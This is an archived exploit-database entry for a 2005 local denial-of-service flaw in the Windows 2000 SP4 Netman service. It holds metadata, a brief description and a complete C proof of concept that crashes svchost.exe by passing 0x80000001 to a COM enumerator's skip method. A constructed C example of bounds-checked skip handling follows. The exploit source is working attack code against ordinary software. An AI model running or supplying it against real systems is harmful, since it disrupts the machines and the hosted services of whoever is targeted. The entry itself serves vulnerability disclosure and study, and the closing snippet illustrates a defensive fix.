Vendor: Windows 2000
By: bkbll
CVSS: 7.5 HIGH
Denial of Service (DoS)
CWE: 400
Product Name: Windows 2000
Affected Version From: Windows 2000 SP4
Affected Version To: Windows 2000 SP4
Patch Exists: NO
Related CWE: N/A
CPE: o:microsoft:windows_2000::sp4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2005

Windows Netman Service Local DOS Vulnerability

This vulnerability allows an attacker to cause a denial of service (DoS) condition on a vulnerable system. It is due to an error in the handling of certain parameters passed to the 'VCConnectionManagerEnumConnection' interface of the 'Netman' service, which is hosted by the 'svchost.exe' process. An attacker can exploit it by sending a specially crafted request to the vulnerable system; the proof of concept below does so through a local COM activation (CLSCTX_LOCAL_SERVER) and a call to the interface's skip method with the value 0x80000001. The call causes the 'svchost.exe' process to crash, resulting in a denial of service condition.

Mitigation:

No known mitigation or remediation is available for this vulnerability.
Source

Exploit-DB raw data:

/* Windows Netman Service Local DOS Vulnerability.
 * 
 * By bkbll bkbll#cnhonker.net 2005-7-14 2:49??
 *
 * TESTED ON win2k sp4
 * 
 * ??Netman???svchost.exe -k netsvcs??, ????????,????????:
 * 
 * EventSystem,Irmon,RasMan,NtmsSvc,SENS
 * 
 */
#define _WIN32_DCOM

#include <stdio.h>
#include <stdlib.h>
#include <objbase.h>
#include <unknwn.h>
#include <windows.h>

#pragma comment(lib,"ole32")
    
MIDL_INTERFACE("98133274-4B20-11D1-AB01-00805FC1270E")
VCConnectionManagerEnumConnection //: public IDispatch
{
public:
	virtual HRESULT STDMETHODCALLTYPE QueryInterface(void) = 0;
	virtual ULONG STDMETHODCALLTYPE AddRef( void) = 0;
	virtual ULONG STDMETHODCALLTYPE Release( void) = 0;
	virtual HRESULT STDMETHODCALLTYPE next(void) = 0;
	virtual HRESULT STDMETHODCALLTYPE skip(DWORD) = 0;
	virtual HRESULT STDMETHODCALLTYPE reset(void) = 0;
	virtual HRESULT STDMETHODCALLTYPE clone(void) = 0;
};
CLSID CLSID_ConnectionManagerEnumConnection = {0x0BA126AD2,0x2166,0x11D1,{0xB1,0xD0, 0x0, 0x80, 0x5F, 0x0C1, 0x27, 0x0E}};
IID IID_IEnumNetConnection  = {0xC08956A0,0x1CD3,0x11D1,{0x0B1,0x0C5, 0x0, 0x80, 0x5F, 0x0C1, 0x27, 0x0E}};

// Entry point
int main(int argc,char **argv)
{
	VCConnectionManagerEnumConnection *clientcall;
	HRESULT hr;
	
	printf("Windows Netman Service Local DOS Vulnerability..\n\n");
	// Initialize COM for this thread (multithreaded apartment)
	CoInitializeEx(NULL,COINIT_MULTITHREADED);

	printf("DCOM Client Trying started\n");
	hr = CoCreateInstance(CLSID_ConnectionManagerEnumConnection,NULL,CLSCTX_LOCAL_SERVER,IID_IEnumNetConnection,(void**)&clientcall);
	if (hr != S_OK)
	{
		// COM reports failure through the HRESULT, not GetLastError()
		printf("CoCreateInstance failed:0x%08lx\n",(unsigned long)hr);
		CoUninitialize();
		return -1;
	}
	printf("Exploit netman service ....\n");
	hr = clientcall->skip(0x80000001);//(void**)&p);
	if(SUCCEEDED(hr))
	{
		printf("Call client proc Success.\n");
	}
	else
		printf("Call client proc failed:0x%08lx\n",(unsigned long)hr);
	clientcall->Release();
	CoUninitialize();
	printf("Client exited.\n");
	return 0;
}

// milw0rm.com [2005-07-14]
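
The proof of concept passes 0x80000001 as the count to the enumerator's skip method, and the page does not give the root cause inside Netman. The following is an added example, not code from this advisory or from Windows: a C model of how an enumerator's Skip can bound a caller-supplied 32-bit count, following the IEnumXXXX::Skip convention of reporting a short skip. The type conn_enum, the function names and the SKIP_* codes are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Constructed stand-ins for the COM result codes S_OK and S_FALSE. */
#define SKIP_OK      0
#define SKIP_PARTIAL 1

/* Hypothetical enumerator state; invariant: pos <= count. */
typedef struct {
    uint32_t count;  /* items in the collection */
    uint32_t pos;    /* cursor into the collection */
} conn_enum;

/*
 * Skip `celt` items. `celt` is caller-controlled, so it is never added to
 * `pos` directly (pos + celt can wrap) and never converted to a signed type
 * (0x80000001 would become a large negative number). It is compared against
 * the number of items left, and the cursor is clamped to the end.
 */
int conn_enum_skip(conn_enum *e, uint32_t celt)
{
    uint32_t remaining;

    if (e == NULL || e->pos > e->count)
        return -1;                    /* corrupted state: refuse to move */

    remaining = e->count - e->pos;    /* cannot underflow: pos <= count */
    if (celt > remaining) {
        e->pos = e->count;            /* short skip: stop at the end */
        return SKIP_PARTIAL;
    }
    e->pos += celt;                   /* cannot overflow: celt <= remaining */
    return SKIP_OK;
}

/* Runs one skip on a constructed enumerator and returns the new cursor. */
uint32_t skip_from(uint32_t count, uint32_t pos, uint32_t celt, int *rc)
{
    conn_enum e = { count, pos };
    *rc = conn_enum_skip(&e, celt);
    return e.pos;
}

int main(void)
{
    int rc;
    uint32_t pos = skip_from(5, 2, 0x80000001u, &rc); /* value used by the PoC */
    printf("cursor=%u rc=%d\n", (unsigned)pos, rc);
    return 0;
}
```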